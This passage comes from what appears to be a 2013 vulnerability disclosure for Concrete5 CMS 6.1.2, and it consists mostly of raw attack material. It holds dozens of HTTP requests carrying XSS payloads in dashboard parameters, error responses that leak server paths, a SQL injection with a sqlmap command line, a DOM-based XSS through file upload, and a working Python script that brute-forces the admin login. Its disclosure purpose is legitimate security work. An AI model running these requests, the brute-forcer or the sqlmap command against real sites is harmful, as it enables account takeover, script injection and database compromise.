GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by="><script>alert(4)</script>&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
7. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(5)</script>&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
8. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults='%3e"%3e&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
Warning: Division by zero in /var/www/concrete5/concrete5.6.1.2/concrete/core/libraries/item_list.php on line 263
<div class="ccm-paging-top">Viewing <b>1</b> to <b><span id="pagingPageResults">0</span></b> (<b><span id="pagingTotalResults">54</span></b> Total)</div></div>
</div>
<div class="ccm-pane-footer">
9. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField="><script>alert(33)</script>"%3eXXX&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
10. information disclosure:
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 06:25:12 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 191
Connection: close
Content-Type: text/html
Fatal error: Call to a member function getAttributeType() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/controllers/single_pages/dashboard/files/search.php on line 134
11. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(1111)</script>&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
12. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir="><script>alert(123)</script>&ccm_order_by=&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
13. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by="><script>alert(/1/)</script>XXX&fileSelector=&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
14. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&ccm_order_dir=&ccm_order_by=&fileSelector="><script>alert(2)</script>&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D=&ccm_order_by=fDateAdded&ccm_order_dir=asc&searchType=DASHBOARD&searchInstance=file1376287516 HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
15. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/save_mobile_theme/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 94
MOBILE_THEME_ID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&save_mobile_theme=Save
---< request >---
16. XSS in SQL query error msg:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/types/add/do_add/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 187
ccm_token=1376290923%3Acf6fd358ef1afdfbf6d0206725a108b4&task=add&ctName=asdasdasd&ctHandle=asdasdasdasd&ctIcon='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&ccm-submit-add_page_type=Add
---< request >---
resp:
<div class="alert alert-error"><button type="button" class="close" data-dismiss="alert">×</button>
mysql error: [1062: Duplicate entry 'asdasdasdasd' for key 'ctHandle'] in EXECUTE("insert into PageTypes (ctHandle, ctName, ctIcon, ctIsInternal, pkgID) values ('asdasdasdasd', 'asdasdasd', '\'>\"><body onload=alert(/4321/)>', 0, 0)")
<br/>
</div>
17. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/users/attributes/edit/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 314
akID=10&akHandle=profile_private_messages_enabled&akName=%2f#%3csvg%2fonload%3dalert(4321)%3e&asID=0&akIsSearchableIndexed=1&akIsSearchable=1&atID=3&akCategoryID=2&ccm_token=1376290584%3A871b3d29741d11ea375c5803f202ce16&uakProfileEdit=1&uakRegisterEdit=1&akCheckedByDefault=1&ccm-submit-ccm-attribute-key-form=Save
---< request >---
18. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 971
input_theme_style_body-background_1='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
resp:
<input type="hidden" name="input_theme_style_body-background_1" id="input_theme_style_body-background_1" value="'>"><img/src="x"/onerror="alert(4321)">" />
<div class="ccm-theme-style-color " id="theme_style_body-background_1"><div hex-color="'>"><img/src="x"/onerror="alert(4321)">" style="background-color: '>"><img/src="x"/onerror="alert(4321)">"></div></div>
19. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
20. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
21. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
22. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID=60&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:15:54 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 359
Connection: close
Content-Type: text/html
Catchable fatal error: Argument 2 passed to Concrete5_Model_PermissionAccess::getByID() must be an instance of PermissionKey, null given, called in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 23 and defined in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/access/model.php on line 206
23. information disclosure:
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/categories/block_type?ccm_token=1376291705:b56babf6af36363f211c7996e6986f60&task=save_permission&pkID=16 HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
paID="%20body%20onload%3d"alert(4321)"%3e&blockTypesIncluded%5B1%5D=A
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:16:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 165
Connection: close
Content-Type: text/html
Fatal error: Call to a member function save() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/tools/permissions/categories/block_type.php on line 24
24. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1033
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%27%3e%22%3e%3c%69%6d%67%2f%73%72%63%3d%22%78%22%2f%6f%6e%65%72%72%6f%72%3d%22%61%6c%65%72%74%28%34%33%32%31%29%22%3e&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
25. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 966
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
26. xss
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 963
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
27. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 965
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&input_theme_style_tag-highlight_1=%23A0DBE3&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
28. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/pages/themes/customize/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 952
input_theme_style_body-background_1=%23dff5ff&input_theme_style_header-background_1=%23fff&input_theme_style_main-background_1=%23fff&input_theme_style_footer-background_1=%23a0dbe3&input_theme_style_nav-links_1=%23000&input_theme_style_nav-hover_1=%23a0dbe3&input_theme_style_site-title_1=%23000&input_theme_style_links_1=%230099ff&input_theme_style_headings_1=%23000&input_theme_style_tag-highlight_1="%20body%20onload%3d"alert(4321)"%3e&input_theme_style_text_1=%23000&input_theme_style_footer-text_1=%23000&input_theme_style_p-font_20=font-family%3A+%27Merriweather%27%2C+Georgia%2C+serif%3B+line-height%3A+1.8em%3B+font-size%3A+14px%3B&ccm_token=1376291055%3A154097491b185240bbb348129b651d28&saveAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Fsave%2F&resetAction=%2Fconcrete5%2Fconcrete5.6.1.2%2Findex.php%2Fdashboard%2Fpages%2Fthemes%2Fcustomize%2Freset%2F&themeID=4&ttask=preview_theme_customization
---< request >---
29. information disclosure
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/permissions/access_entity HTTP/1.1
Host: 10.149.14.52
(...)
Cache-Control: no-cache
task=save_permissions&accessType=10&peID=6&pdID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&pdStartDate_activate=on&pdStartDate_dt=8%2F12%2F2013&pdStartDate_h=9&pdStartDate_m=16&pdStartDate_a=AM&pdEndDate_activate=on&pdEndDate_dt=8%2F12%2F2013&pdEndDate_h=9&pdEndDate_m=16&pdEndDate_a=AM&pdRepeatPeriod=&pdRepeatPeriodDaysEvery=1&pdRepeatPeriodMonthsRepeatBy=month&pdRepeatPeriodMonthsEvery=1&pdRepeatPeriodWeeksDays%5B%5D=1&pdRepeatPeriodWeeksEvery=1&pdEndRepeatDate=
---< request >---
resp:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2013 07:19:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 172
Connection: close
Content-Type: text/html
Fatal error: Call to a member function setStartDateAllDay() on a non-object in /var/www/concrete5/concrete5.6.1.2/concrete/core/models/permission/duration.php on line 205
30. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/basics/site_name/update_sitename/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 142
ccm_token=1376292237%3A47e17cc29a3b0e20cd35e618aebc20d8&SITE='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&ccm-submit-site-form=Save
---< request >---
31. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/tracking_codes/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 190
ccm_token=1376292246%3A18fb91291997356ac1a2f84e7edd3e07&tracking_code='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&tracking_code_position=bottom&ccm-submit-tracking-code-form=Save
---< request >---
32. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/seo/excluded/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 87
SEO_EXCLUDE_WORDS='"`%3cimg%20src%3dx%20onerror%3dalert(4321)%3e&ccm-submit-button=Save
---< request >---
33. xss
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/dashboard/system/mail/importers/save_importer/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 210
miID=1&miEmail='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&miIsEnabled=0&miServer=asd&miUsername=asd&miPassword=asd&miEncryption=&miPort=asd&miConnectionMethod=POP&ccm-submit-mail-importer-form=Save
---< request >---
Let me know if you have any questions.
Enjoy ;)
Enjoy:
Starting from description of bugs available for admin user logged-in I should mention
that there is no anti-bruteforce mechanizm, so if admins password is 'simple',
we can crack it, like it was described below:
 |
| Searching admin's password in Concrete5 CMS |
Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py
#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys
username = 'admin'
path = '/index.php/login/do_login/'
print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'
pwdfile = open('passwords.txt','r')
read_pass = pwdfile.readlines()
for test_pass in read_pass:
url = sys.argv[1]+path
data = {
'uName':username,
'uPassword':test_pass,
'rcID':'',
'submit':'Sign+In+%3E',
}
get_cookies = requests.post(url)
conn = requests.post(url, data=data, cookies=get_cookies.cookies)
print '[ > ] Status code for this request: ', conn.status_code
lines = conn.content
if 'Currently' in lines:
print '[+] Logged in as: [', username, '] with password: [', test_pass,']'
---< code >---
So if we will have an admin password, we can start from...
1. SQL injection
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"
8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"
11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"
14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"
AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"
'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"
8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"
<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"
Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"
170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"
0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"
1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
Because "_bf[BLOCK_" parameters are not properly filtered, we can use it to generate sql error, like this:
---< response >---
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">< Back to Home</a></p>
</div>
---< response >---
To reproduce this vulnerability you can use sqlmap tool:
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"
 |
| Example of SQL Injection |
2. DOM-based XSS
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119
-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain
sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"
');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"
1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"
-----------------------------55721791519552--
---< request >---
---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---
3. sql error to check
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
<h1>An unexpected error occurred.</h1>
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID) inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID) where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">< Back to Home</a></p>
</div>
4. xss
---< request >---
